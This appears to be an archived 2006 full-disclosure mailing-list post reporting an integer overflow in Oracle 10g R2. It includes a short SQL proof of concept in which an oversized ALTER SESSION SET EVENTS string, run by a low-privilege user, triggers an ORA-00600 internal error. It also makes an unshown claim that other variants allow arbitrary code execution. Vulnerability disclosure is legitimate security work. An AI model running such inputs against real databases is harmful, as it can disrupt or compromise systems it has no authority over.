[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BAY102-F195B4E6B990ACEAB817A4ADE580@phx.gbl>
Date: Thu, 27 Jul 2006 19:23:41 +0000
From: "putosoft softputo" <hasecorp@...mail.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Cc:
Subject:
Oracle 10g R2 and, probably, all previous versions
I can't believe it. Oracle releases new patches and they have not been
solved one of the main problems: A user with only the SELECT privilege can
do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!!
I'm not sure if is time to full disclosure it but, anyway, I will "full
disclosure" one inocent issue, an integer overflow:
Example:
--Connect with any user with only CREATE SESSION
SQL> alter session set events '10046 trace name context forever, level 16';
Session altered.
SQL> alter session set events
'10046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004
61004610046100461004610046100461004610046100461004610046100461004610046100461004610046trace
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [],
[]
It's not even a crash but (be sure) that there are other "combinations" that
makes it vulnerable to integer overflows allowing the execution of
arbritrary code.
PD: Hello Mary Ann! Are you on holidays?
_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine y TV...
http://es.msn.kiwee.com/ Lo mejor para tu móvil.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists